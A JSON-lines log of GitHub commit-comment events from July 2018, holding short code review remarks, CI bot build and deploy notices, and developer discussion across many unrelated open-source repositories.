{"id":"8025108241","type":"CommitCommentEvent","actor":{"login":"KBeltz"},"repo":{"name":"cu-webteam/d8-platform"},"payload":{"comment":{"id":29849900,"position":11,"line":13,"path":"docroot/themes/custom/cu2017/templates/node/node--featured-content.html.twig","commit_id":"0c8419a25b10848a686be7aac668f1d2453ef863","created_at":"2018-07-26T20:43:16Z","updated_at":"2018-07-26T20:43:16Z","author_association":"CONTRIBUTOR","body":"Why the netID as an ID, rather than a name that states what it does, or what the element is? We should discuss naming conventions at some point. It is perhaps something Kasey could help document."}},"created_at":"2018-07-26T20:43:16Z"}
{"id":"8025108594","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29849904,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-26T20:43:21Z","updated_at":"2018-07-26T20:43:21Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-26T20:43:21Z"}
{"id":"8025111725","type":"CommitCommentEvent","actor":{"login":"wezell"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":29849912,"position":null,"line":null,"path":null,"commit_id":"5483849d0d7081b97eb2a54da1fbf31413827d7a","created_at":"2018-07-26T20:44:00Z","updated_at":"2018-07-26T20:44:00Z","author_association":"CONTRIBUTOR","body":"Not for 5.0"}},"created_at":"2018-07-26T20:44:00Z"}
{"id":"8025112612","type":"CommitCommentEvent","actor":{"login":"senalbulumulle"},"repo":{"name":"senalbulumulle/FOIL-OS-Beta"},"payload":{"comment":{"id":29849913,"position":null,"line":null,"path":null,"commit_id":"f8b88a2354a932c5ed2b1f65a1c86eb44c547cb0","created_at":"2018-07-26T20:44:11Z","updated_at":"2018-07-26T20:44:11Z","author_association":"OWNER","body":"Finally fixed the FOIL OS Network Issue. "}},"created_at":"2018-07-26T20:44:11Z"}
{"id":"8025113460","type":"CommitCommentEvent","actor":{"login":"TobyGoodwin"},"repo":{"name":"rakitzis/rc"},"payload":{"comment":{"id":29849917,"position":null,"line":null,"path":null,"commit_id":"9d071b26bf1b1dcd71efb06dc4fb6c25803856a0","created_at":"2018-07-26T20:44:21Z","updated_at":"2018-07-26T20:44:21Z","author_association":"COLLABORATOR","body":"I think it's sound because normally we treat elide `if not` from the parse tree in `desugar_ifnot()`. It's only at the top level, such as an interactive shell, where you might ever encounter an `nIfnot` node while walking and that's the only time the value of `if_state` is used.\r\n\r\nHowever, that stuff with `old_if_state` does look pretty nasty. If you can come up with anything cleaner, please do!"}},"created_at":"2018-07-26T20:44:21Z"}
{"id":"8025113921","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29849919,"position":null,"line":null,"path":null,"commit_id":"63e5440ce584f84e113e6f8723bf3acec6916e17","created_at":"2018-07-26T20:44:27Z","updated_at":"2018-07-26T20:44:27Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-981](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-981).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-981-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T20:44:27Z"}
{"id":"8025114366","type":"CommitCommentEvent","actor":{"login":"adamgarza"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29849921,"position":21,"line":511,"path":"contrib/zpages/src/main/java/io/opencensus/contrib/zpages/RpczZPageHandler.java","commit_id":"84e5eaf5abdcf0b840fe4adc50de80450a6c76df","created_at":"2018-07-26T20:44:33Z","updated_at":"2018-07-26T20:44:33Z","author_association":"OWNER","body":"@songy23 - Forgive me if I don't always understand... but is this closer to what you had in mind? Standardizing the class/id is work in progress. "}},"created_at":"2018-07-26T20:44:33Z"}
{"id":"8025119004","type":"CommitCommentEvent","actor":{"login":"dubzzz"},"repo":{"name":"Bruce-Feldman/javascript-algorithms"},"payload":{"comment":{"id":29849938,"position":25,"line":15,"path":"src/algorithms/string/rabin-karp/__test__/rabinKarp.test.js","commit_id":"fab2d46ebe10dbe2894b49f856e13e9f356dd904","created_at":"2018-07-26T20:45:32Z","updated_at":"2018-07-26T20:45:32Z","author_association":"NONE","body":"Those 4 examples are the results of property based tests [[code](https://github.com/dubzzz/javascript-algorithms/commit/d6b1a6cd4b1ac736968ab81ae997334a18ae3045)].\r\n\r\nAs suggested in #102, I would rather use such property based testing approach to discover those corner cases instead of adding all of them in the test suite. I am waiting for an input of @trekhleb on this point."}},"created_at":"2018-07-26T20:45:32Z"}
{"id":"8025119005","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29849939,"position":4,"line":25,"path":"pkgs/top-level/all-packages.nix","commit_id":"310cb761359b16ad2ec72662a0b703dbb816a379","created_at":"2018-07-26T20:45:32Z","updated_at":"2018-07-26T20:45:32Z","author_association":"MEMBER","body":"Could this be used as a replacement for crossLibcStdenv?"}},"created_at":"2018-07-26T20:45:32Z"}
{"id":"8025120336","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29849940,"position":null,"line":null,"path":null,"commit_id":"5e2881d79eb2d44401a0467fccf33c7d8bf45982","created_at":"2018-07-26T20:45:49Z","updated_at":"2018-07-26T20:45:49Z","author_association":"OWNER","body":"Wasting memory. Or if you're asking about *github* issue, then the one about stl"}},"created_at":"2018-07-26T20:45:49Z"}
{"id":"8025120823","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29849942,"position":null,"line":null,"path":null,"commit_id":"9655ee264b3c2db52e7cf57fe0d73e331d2e9461","created_at":"2018-07-26T20:45:56Z","updated_at":"2018-07-26T20:45:56Z","author_association":"NONE","body":"159344647-Different-heat-transfer-algorithms-from-reverse-constructions (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2948 of 2948 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T20:45:56Z"}
{"id":"8025126540","type":"CommitCommentEvent","actor":{"login":"adamnsm2"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29849957,"position":10,"line":270,"path":"file.c","commit_id":"e5d16c637a330434d9ebc4212f74e3bdca0e9596","created_at":"2018-07-26T20:47:10Z","updated_at":"2018-07-26T20:47:10Z","author_association":"OWNER","body":"I'm not sure why git is tagging this as a diff, there was a \"removed\" blank line in that location before. "}},"created_at":"2018-07-26T20:47:10Z"}
{"id":"8025128203","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29849960,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T20:47:29Z","updated_at":"2018-07-26T20:47:29Z","author_association":"COLLABORATOR","body":"where did you loose me from?\n\nOn Thu, Jul 26, 2018 at 11:40 PM Wyclif Luyima <notifications@github.com>\nwrote:\n\n> As I said I lost you.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jembi/openmrs-module-msfcore/commit/e4317249e73da99bf34c4a78b8de9d71c96a6b88#commitcomment-29849869>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APJk8oL4r9JOndqXyXdpS5p3x7bj8lV1ks5uKik6gaJpZM4ViVWD>\n> .\n>\n\n\n-- \n\n*Kaweesi Joseph*\n\n*Jembi Health Systems NPC* *|  **Uganda*\n\n*Mobile: **+256784994313** | Office: **Software Developer** | Skype:*\n*kaweesi.joseph*\n*E-mail: kaweesi@jembi.org <kaweesi@jembi.org>*\n\n\n\n*This e-mail contains proprietary and confidential information some or all\nof which may be legally privileged. It is for the intended recipient only.\nIf an addressing or transmission error has misdirected this e-mail, please\nnotify the author by replying to this e-mail and then deleting same. If you\nare not the intended recipient you must not use, disclose, distribute,\ncopy, print or rely on this e-mail. Jembi Health Systems NPO, its\nsubsidiaries and associated companies is not liable for the security of\ninformation sent by e-mail and accepts no liability of whatsoever nature\nfor any loss, damage or expense resulting, directly or indirectly, from the\naccess of this e-mail or any attachments hereto.*\n"}},"created_at":"2018-07-26T20:47:29Z"}
{"id":"8025132131","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/Node-Blog"},"payload":{"comment":{"id":29849971,"position":null,"line":null,"path":null,"commit_id":"3d0a5efa99588741143caa7fa8623ba5ed384373","created_at":"2018-07-26T20:48:22Z","updated_at":"2018-07-26T20:48:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Perform CRUD operations on users, posts, and tags.](https://trello.com/c/2NriioeA/2-perform-crud-operations-on-users-posts-and-tags)"}},"created_at":"2018-07-26T20:48:22Z"}
{"id":"8025132404","type":"CommitCommentEvent","actor":{"login":"songy23"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29849972,"position":21,"line":511,"path":"contrib/zpages/src/main/java/io/opencensus/contrib/zpages/RpczZPageHandler.java","commit_id":"84e5eaf5abdcf0b840fe4adc50de80450a6c76df","created_at":"2018-07-26T20:48:25Z","updated_at":"2018-07-26T20:48:25Z","author_association":"NONE","body":"No worries - I think this class should be a top-level class (a package-private class) so that other `ZPageHandler`s can also access it."}},"created_at":"2018-07-26T20:48:25Z"}
{"id":"8025132714","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/Node-Blog"},"payload":{"comment":{"id":29849973,"position":null,"line":null,"path":null,"commit_id":"2e6625baced3f8043ad4b0f4e85d3382ea7aeb54","created_at":"2018-07-26T20:48:29Z","updated_at":"2018-07-26T20:48:29Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Perform CRUD operations on users, posts, and tags.](https://trello.com/c/2NriioeA/2-perform-crud-operations-on-users-posts-and-tags)"}},"created_at":"2018-07-26T20:48:29Z"}
{"id":"8025136620","type":"CommitCommentEvent","actor":{"login":"Bruce-Feldman"},"repo":{"name":"Bruce-Feldman/javascript-algorithms"},"payload":{"comment":{"id":29849982,"position":25,"line":15,"path":"src/algorithms/string/rabin-karp/__test__/rabinKarp.test.js","commit_id":"fab2d46ebe10dbe2894b49f856e13e9f356dd904","created_at":"2018-07-26T20:49:18Z","updated_at":"2018-07-26T20:49:18Z","author_association":"OWNER","body":"Makes sense to me.  "}},"created_at":"2018-07-26T20:49:18Z"}
{"id":"8025147874","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29850012,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-26T20:51:43Z","updated_at":"2018-07-26T20:51:43Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-26T20:51:43Z"}
{"id":"8025148549","type":"CommitCommentEvent","actor":{"login":"Baschdl"},"repo":{"name":"timediv/docker-ucl-cluster"},"payload":{"comment":{"id":29850015,"position":10,"line":33,"path":"Dockerfile","commit_id":"2824752f905939ec8d5e85d81c741cea90448524","created_at":"2018-07-26T20:51:52Z","updated_at":"2018-07-26T20:51:52Z","author_association":"NONE","body":"Did you consider `apt-get install python3-pip`? 😄 "}},"created_at":"2018-07-26T20:51:52Z"}
{"id":"8025151423","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29850019,"position":null,"line":null,"path":null,"commit_id":"ac848453d02eaf2c9c82c9b596478ce934e0e82c","created_at":"2018-07-26T20:52:31Z","updated_at":"2018-07-26T20:52:31Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [upstreamre](https://upstreamre-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/maintain-custom-upstream](https://upstreamre-static-docs.pantheonsite.io/docs/maintain-custom-upstream)\n"}},"created_at":"2018-07-26T20:52:31Z"}
{"id":"8025152733","type":"CommitCommentEvent","actor":{"login":"mikadias5562"},"repo":{"name":"mikadias5562/imagens_kratos"},"payload":{"comment":{"id":29850024,"position":1,"line":1,"path":"Categoria de Filmes 01","commit_id":"9c2f0666f0eeff3d81f6b85c7745143bd65187dd","created_at":"2018-07-26T20:52:47Z","updated_at":"2018-07-26T20:52:47Z","author_association":"OWNER","body":"![fundo](https://user-images.githubusercontent.com/38801913/43287770-56f3d874-90fc-11e8-8cb2-3c2ab2c1ed8f.jpg)\r\n"}},"created_at":"2018-07-26T20:52:47Z"}
{"id":"8025153434","type":"CommitCommentEvent","actor":{"login":"Saicheg"},"repo":{"name":"rubizza-survival-camp/summer-2018"},"payload":{"comment":{"id":29850028,"position":6,"line":161,"path":"README.md","commit_id":"a37e3bc79b661d5ef16d8174fea68d75d6be8aa6","created_at":"2018-07-26T20:52:55Z","updated_at":"2018-07-26T20:52:55Z","author_association":"CONTRIBUTOR","body":"🔥 "}},"created_at":"2018-07-26T20:52:55Z"}
{"id":"8025157345","type":"CommitCommentEvent","actor":{"login":"sanyaivanov"},"repo":{"name":"FIKcYS/bicycle-shop-app"},"payload":{"comment":{"id":29850045,"position":137,"line":124,"path":"server/src/main/java/com/akvelon/shchepilin/db/dao/impl/ProductDAOImpl.java","commit_id":"f9d88d3d8af35fcd8c879052c97f4ab96b0d9503","created_at":"2018-07-26T20:53:43Z","updated_at":"2018-07-26T20:53:43Z","author_association":"NONE","body":"You can use UUID\r\n"}},"created_at":"2018-07-26T20:53:43Z"}
{"id":"8025160169","type":"CommitCommentEvent","actor":{"login":"sanyaivanov"},"repo":{"name":"FIKcYS/bicycle-shop-app"},"payload":{"comment":{"id":29850070,"position":116,"line":103,"path":"server/src/main/java/com/akvelon/shchepilin/db/dao/impl/ProductDAOImpl.java","commit_id":"f9d88d3d8af35fcd8c879052c97f4ab96b0d9503","created_at":"2018-07-26T20:54:18Z","updated_at":"2018-07-26T20:54:18Z","author_association":"NONE","body":"Create single method with 4 arguments \r\n"}},"created_at":"2018-07-26T20:54:18Z"}
{"id":"8025162403","type":"CommitCommentEvent","actor":{"login":"sanyaivanov"},"repo":{"name":"FIKcYS/bicycle-shop-app"},"payload":{"comment":{"id":29850084,"position":116,"line":103,"path":"server/src/main/java/com/akvelon/shchepilin/db/dao/impl/ProductDAOImpl.java","commit_id":"f9d88d3d8af35fcd8c879052c97f4ab96b0d9503","created_at":"2018-07-26T20:54:46Z","updated_at":"2018-07-26T20:54:46Z","author_association":"NONE","body":"Or make builder\r\n"}},"created_at":"2018-07-26T20:54:46Z"}
{"id":"8025165849","type":"CommitCommentEvent","actor":{"login":"sanyaivanov"},"repo":{"name":"FIKcYS/bicycle-shop-app"},"payload":{"comment":{"id":29850097,"position":95,"line":89,"path":"server/src/main/java/com/akvelon/shchepilin/db/dao/impl/ProductDAOImpl.java","commit_id":"f9d88d3d8af35fcd8c879052c97f4ab96b0d9503","created_at":"2018-07-26T20:55:28Z","updated_at":"2018-07-26T20:55:28Z","author_association":"NONE","body":"You can use new ArrayList<>(photoPhotoIDList)"}},"created_at":"2018-07-26T20:55:28Z"}
{"id":"8025169306","type":"CommitCommentEvent","actor":{"login":"sanyaivanov"},"repo":{"name":"FIKcYS/bicycle-shop-app"},"payload":{"comment":{"id":29850114,"position":95,"line":89,"path":"server/src/main/java/com/akvelon/shchepilin/db/dao/impl/ProductDAOImpl.java","commit_id":"f9d88d3d8af35fcd8c879052c97f4ab96b0d9503","created_at":"2018-07-26T20:56:10Z","updated_at":"2018-07-26T20:56:10Z","author_association":"NONE","body":"Use stream java 8"}},"created_at":"2018-07-26T20:56:10Z"}
{"id":"8025174886","type":"CommitCommentEvent","actor":{"login":"sanyaivanov"},"repo":{"name":"FIKcYS/bicycle-shop-app"},"payload":{"comment":{"id":29850138,"position":52,"line":54,"path":"server/src/main/java/com/akvelon/shchepilin/db/dao/impl/ProductDAOImpl.java","commit_id":"f9d88d3d8af35fcd8c879052c97f4ab96b0d9503","created_at":"2018-07-26T20:57:18Z","updated_at":"2018-07-26T20:57:18Z","author_association":"NONE","body":"ProductLine.STANDART"}},"created_at":"2018-07-26T20:57:18Z"}
{"id":"8025177452","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29850144,"position":null,"line":null,"path":null,"commit_id":"5756c0ebd97e453e20754b83cea57ebec0c97c4c","created_at":"2018-07-26T20:57:51Z","updated_at":"2018-07-26T20:57:51Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [upstreamre](https://upstreamre-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/maintain-custom-upstream](https://upstreamre-static-docs.pantheonsite.io/docs/maintain-custom-upstream)\n"}},"created_at":"2018-07-26T20:57:51Z"}
{"id":"8025178973","type":"CommitCommentEvent","actor":{"login":"ptpt52"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29850149,"position":9,"line":6,"path":"target/linux/ipq40xx/patches-4.14/071-qcom-ipq4019-use-v2-of-the-kpss-bringup-mechanism.patch","commit_id":"95672e04335ea0d7d8f468cec8f63d593cc6ede6","created_at":"2018-07-26T20:58:11Z","updated_at":"2018-07-26T20:58:11Z","author_association":"CONTRIBUTOR","body":"but it is not work on RT-ARCH17\r\n\r\n> [    0.001133] CPU: Testing write buffer coherency: ok\r\n[    0.001725] Setting up static identity map for 0x80300000 - 0x80300060\r\n[    0.001851] Hierarchical SRCU implementation.\r\n[    0.002410] smp: Bringing up secondary CPUs ...\r\n[    0.002787] CPU1: failed to boot: -19\r\n[    0.003180] CPU2: failed to boot: -19\r\n[    0.003589] CPU3: failed to boot: -19\r\n[    0.003625] smp: Brought up 1 node, 1 CPU\r\n[    0.003636] SMP: Total of 1 processors activated (96.00 BogoMIPS).\r\n[    0.003643] CPU: All CPU(s) started in SVC mode.\r\n"}},"created_at":"2018-07-26T20:58:11Z"}
{"id":"8025182751","type":"CommitCommentEvent","actor":{"login":"kumar303"},"repo":{"name":"mozilla/addons-frontend"},"payload":{"comment":{"id":29850159,"position":17,"line":17,"path":"src/amo/client.js","commit_id":"b5f49aae9eeb05622ab5923e12e84eb42791f462","created_at":"2018-07-26T20:58:57Z","updated_at":"2018-07-26T20:58:57Z","author_association":"MEMBER","body":"Did you mean to accept sagas here? I thought we had to add some custom restart code for that to work."}},"created_at":"2018-07-26T20:58:57Z"}
{"id":"8025183976","type":"CommitCommentEvent","actor":{"login":"sanyaivanov"},"repo":{"name":"FIKcYS/bicycle-shop-app"},"payload":{"comment":{"id":29850160,"position":18,"line":21,"path":"server/src/main/java/com/akvelon/shchepilin/db/dao/impl/ProductDAOImpl.java","commit_id":"f9d88d3d8af35fcd8c879052c97f4ab96b0d9503","created_at":"2018-07-26T20:59:11Z","updated_at":"2018-07-26T20:59:11Z","author_association":"NONE","body":"Need to add constructor and move annotation @Autowired to constructor \r\n"}},"created_at":"2018-07-26T20:59:11Z"}
{"id":"8025184093","type":"CommitCommentEvent","actor":{"login":"trel"},"repo":{"name":"irods-contrib/irods_tools_lustre"},"payload":{"comment":{"id":29850161,"position":null,"line":null,"path":null,"commit_id":"41c71f5e9ef2bbd7367afe11fba3328d40a2690e","created_at":"2018-07-26T20:59:13Z","updated_at":"2018-07-26T20:59:13Z","author_association":"CONTRIBUTOR","body":"Related to #12"}},"created_at":"2018-07-26T20:59:13Z"}
{"id":"8025186599","type":"CommitCommentEvent","actor":{"login":"KOLANICH"},"repo":{"name":"tqdm/tqdm"},"payload":{"comment":{"id":29850169,"position":null,"line":null,"path":null,"commit_id":"97a93932742db9e2c38672219a0aef8d1b3ad482","created_at":"2018-07-26T20:59:44Z","updated_at":"2018-07-26T20:59:44Z","author_association":"NONE","body":"1 The name is too long :(\r\n2 IMHO this mode should be used by default"}},"created_at":"2018-07-26T20:59:44Z"}
{"id":"8025190291","type":"CommitCommentEvent","actor":{"login":"sanyaivanov"},"repo":{"name":"FIKcYS/bicycle-shop-app"},"payload":{"comment":{"id":29850186,"position":15,"line":15,"path":"server/src/main/java/com/akvelon/shchepilin/service/impl/ProductPhotoServiceImpl.java","commit_id":"f9d88d3d8af35fcd8c879052c97f4ab96b0d9503","created_at":"2018-07-26T21:00:28Z","updated_at":"2018-07-26T21:00:28Z","author_association":"NONE","body":"Constructor "}},"created_at":"2018-07-26T21:00:28Z"}
{"id":"8025192524","type":"CommitCommentEvent","actor":{"login":"sanyaivanov"},"repo":{"name":"FIKcYS/bicycle-shop-app"},"payload":{"comment":{"id":29850190,"position":124,"line":111,"path":"server/src/main/java/com/akvelon/shchepilin/db/dao/impl/ProductDAOImpl.java","commit_id":"f9d88d3d8af35fcd8c879052c97f4ab96b0d9503","created_at":"2018-07-26T21:00:54Z","updated_at":"2018-07-26T21:00:54Z","author_association":"NONE","body":"Please, use pattern Builder "}},"created_at":"2018-07-26T21:00:54Z"}
{"id":"8025196382","type":"CommitCommentEvent","actor":{"login":"glowek"},"repo":{"name":"glowek/glowek.github.io"},"payload":{"comment":{"id":29850200,"position":null,"line":null,"path":null,"commit_id":"02bc3f2f987941ce8e32a02bfb88c14687691576","created_at":"2018-07-26T21:01:42Z","updated_at":"2018-07-26T21:01:42Z","author_association":"OWNER","body":"spierdolone, jak zrobic spowrotem \r\nma byc idndex.md"}},"created_at":"2018-07-26T21:01:42Z"}
{"id":"8025198211","type":"CommitCommentEvent","actor":{"login":"sanyaivanov"},"repo":{"name":"FIKcYS/bicycle-shop-app"},"payload":{"comment":{"id":29850204,"position":18,"line":38,"path":"server/src/main/java/com/akvelon/shchepilin/controller/HomeController.java","commit_id":"24827822d8aa892ec80001c3a0cc596ff095ef1b","created_at":"2018-07-26T21:02:07Z","updated_at":"2018-07-26T21:02:07Z","author_association":"NONE","body":"@RequestMapping(value = \"products\", method = RequestMethod.POST)"}},"created_at":"2018-07-26T21:02:07Z"}
{"id":"8025200679","type":"CommitCommentEvent","actor":{"login":"sanyaivanov"},"repo":{"name":"FIKcYS/bicycle-shop-app"},"payload":{"comment":{"id":29850213,"position":23,"line":43,"path":"server/src/main/java/com/akvelon/shchepilin/controller/HomeController.java","commit_id":"24827822d8aa892ec80001c3a0cc596ff095ef1b","created_at":"2018-07-26T21:02:38Z","updated_at":"2018-07-26T21:02:38Z","author_association":"NONE","body":"@RequestMapping(value = \"/products/{id}\", method = RequestMethod.DELETE)"}},"created_at":"2018-07-26T21:02:38Z"}
{"id":"8025203024","type":"CommitCommentEvent","actor":{"login":"flyntrudolph"},"repo":{"name":"flyntrudolph/live.lecture"},"payload":{"comment":{"id":29850223,"position":null,"line":null,"path":null,"commit_id":"b10dc654bdb983d7ddc189bd76bba422ae34cff7","created_at":"2018-07-26T21:03:09Z","updated_at":"2018-07-26T21:03:09Z","author_association":"OWNER","body":"nice commit Greg, solid work!"}},"created_at":"2018-07-26T21:03:09Z"}
{"id":"8025204711","type":"CommitCommentEvent","actor":{"login":"sanyaivanov"},"repo":{"name":"FIKcYS/bicycle-shop-app"},"payload":{"comment":{"id":29850236,"position":24,"line":44,"path":"server/src/main/java/com/akvelon/shchepilin/controller/HomeController.java","commit_id":"24827822d8aa892ec80001c3a0cc596ff095ef1b","created_at":"2018-07-26T21:03:31Z","updated_at":"2018-07-26T21:03:31Z","author_association":"NONE","body":"Need to change type of return!\r\n@RequestBody String id ->@RequestParam Long id -"}},"created_at":"2018-07-26T21:03:31Z"}
{"id":"8025206192","type":"CommitCommentEvent","actor":{"login":"TallFurryMan"},"repo":{"name":"sterne-jaeger/kstars"},"payload":{"comment":{"id":29850246,"position":25,"line":515,"path":"kstars/ekos/scheduler/schedulerjob.cpp","commit_id":"ff2d77075e66708cd7e9664fad3b96b1b01a16c3","created_at":"2018-07-26T21:03:50Z","updated_at":"2018-07-26T21:03:50Z","author_association":"NONE","body":"Sorry I fixed an issue in there in the meantime, you'll have to be cautious. Basically there's no more lightFramesRequired in there."}},"created_at":"2018-07-26T21:03:50Z"}
{"id":"8025208305","type":"CommitCommentEvent","actor":{"login":"sanyaivanov"},"repo":{"name":"FIKcYS/bicycle-shop-app"},"payload":{"comment":{"id":29850255,"position":3,"line":3,"path":"server/src/main/java/com/akvelon/shchepilin/db/constants/QUERY.java","commit_id":"24827822d8aa892ec80001c3a0cc596ff095ef1b","created_at":"2018-07-26T21:04:15Z","updated_at":"2018-07-26T21:04:15Z","author_association":"NONE","body":"WTF, Why do you use Upper case?"}},"created_at":"2018-07-26T21:04:15Z"}
{"id":"8025211317","type":"CommitCommentEvent","actor":{"login":"JuliaAllen365"},"repo":{"name":"JuliaAllen365/our-role.model"},"payload":{"comment":{"id":29850287,"position":1,"line":1,"path":"README.md","commit_id":"9b3546f6ee365ddf30139e6b06ca08df72d9f387","created_at":"2018-07-26T21:04:55Z","updated_at":"2018-07-26T21:04:55Z","author_association":"OWNER","body":"cool\r\n"}},"created_at":"2018-07-26T21:04:55Z"}
{"id":"8025213051","type":"CommitCommentEvent","actor":{"login":"willdurand"},"repo":{"name":"mozilla/addons-frontend"},"payload":{"comment":{"id":29850290,"position":17,"line":17,"path":"src/amo/client.js","commit_id":"b5f49aae9eeb05622ab5923e12e84eb42791f462","created_at":"2018-07-26T21:05:16Z","updated_at":"2018-07-26T21:05:16Z","author_association":"MEMBER","body":"I will take a closer look but when we edit a reducer, it often triggers an update for the saga, because we import the reducer file into the saga. I think without `./sagas` in this list, HMR does not work because HRL (Hot React Loader) does not know how to apply the update."}},"created_at":"2018-07-26T21:05:16Z"}
{"id":"8025215388","type":"CommitCommentEvent","actor":{"login":"Zelofff"},"repo":{"name":"serginij/reactBlog"},"payload":{"comment":{"id":29850296,"position":7,"line":7,"path":"src/containers/Post/Post.css","commit_id":"12ebd9f0872362fcb336dab87161b7a5c69eddbc","created_at":"2018-07-26T21:05:48Z","updated_at":"2018-07-26T21:05:48Z","author_association":"NONE","body":"В следующий раз юзай stlyed-components или react-jss хотя бы"}},"created_at":"2018-07-26T21:05:48Z"}
{"id":"8025216505","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29850303,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T21:06:02Z","updated_at":"2018-07-26T21:06:02Z","author_association":"NONE","body":"The unit tests"}},"created_at":"2018-07-26T21:06:02Z"}
{"id":"8025221862","type":"CommitCommentEvent","actor":{"login":"Zelofff"},"repo":{"name":"serginij/reactBlog"},"payload":{"comment":{"id":29850318,"position":15,"line":15,"path":"src/containers/Post/Post.js","commit_id":"12ebd9f0872362fcb336dab87161b7a5c69eddbc","created_at":"2018-07-26T21:07:13Z","updated_at":"2018-07-26T21:07:13Z","author_association":"NONE","body":"Хорошая практика, везде, где юзаешь props делай деструктизацию и юзай переменные\r\nт.е.\r\n`const { someProp, someProp2 } = this.props`\r\nсо стейтом тоже самое\r\n"}},"created_at":"2018-07-26T21:07:13Z"}
{"id":"8025222891","type":"CommitCommentEvent","actor":{"login":"ptpt52"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29850320,"position":9,"line":6,"path":"target/linux/ipq40xx/patches-4.14/071-qcom-ipq4019-use-v2-of-the-kpss-bringup-mechanism.patch","commit_id":"95672e04335ea0d7d8f468cec8f63d593cc6ede6","created_at":"2018-07-26T21:07:25Z","updated_at":"2018-07-26T21:07:25Z","author_association":"CONTRIBUTOR","body":"and it works proper by dropping this patch"}},"created_at":"2018-07-26T21:07:25Z"}
{"id":"8025223820","type":"CommitCommentEvent","actor":{"login":"ELanning"},"repo":{"name":"Faithlife/styled-ui"},"payload":{"comment":{"id":29850322,"position":9,"line":9,"path":"components/help-box/component.jsx","commit_id":"1bce2dbccf6941c96c077782fe1d4afb0aa46b6b","created_at":"2018-07-26T21:07:36Z","updated_at":"2018-07-26T21:07:36Z","author_association":"NONE","body":"Why not have an `icon` prop that defaults to the light bulb? This allows it to be easily swapped out if the consumer wants to use their own icon and eliminates the Boolean prop. \r\n\r\n`showLightBulb` is a sub-optimal prop because if they want to _not_ have the bulb icon it would make more sense for them to simply use the `BlueBoxContent` component (or just set the proposed `icon` prop to null), it also breaks this general principle - https://martinfowler.com/bliki/TellDontAsk.html"}},"created_at":"2018-07-26T21:07:36Z"}
{"id":"8025226052","type":"CommitCommentEvent","actor":{"login":"willdurand"},"repo":{"name":"mozilla/addons-frontend"},"payload":{"comment":{"id":29850331,"position":17,"line":17,"path":"src/amo/client.js","commit_id":"b5f49aae9eeb05622ab5923e12e84eb42791f462","created_at":"2018-07-26T21:08:07Z","updated_at":"2018-07-26T21:08:07Z","author_association":"MEMBER","body":"For the sagas code, what we will need is a way to stop all the sagas and a way to restart them. Yet, some people think it is a bad idea: https://github.com/redux-saga/redux-saga/issues/22#issuecomment-218737951"}},"created_at":"2018-07-26T21:08:07Z"}
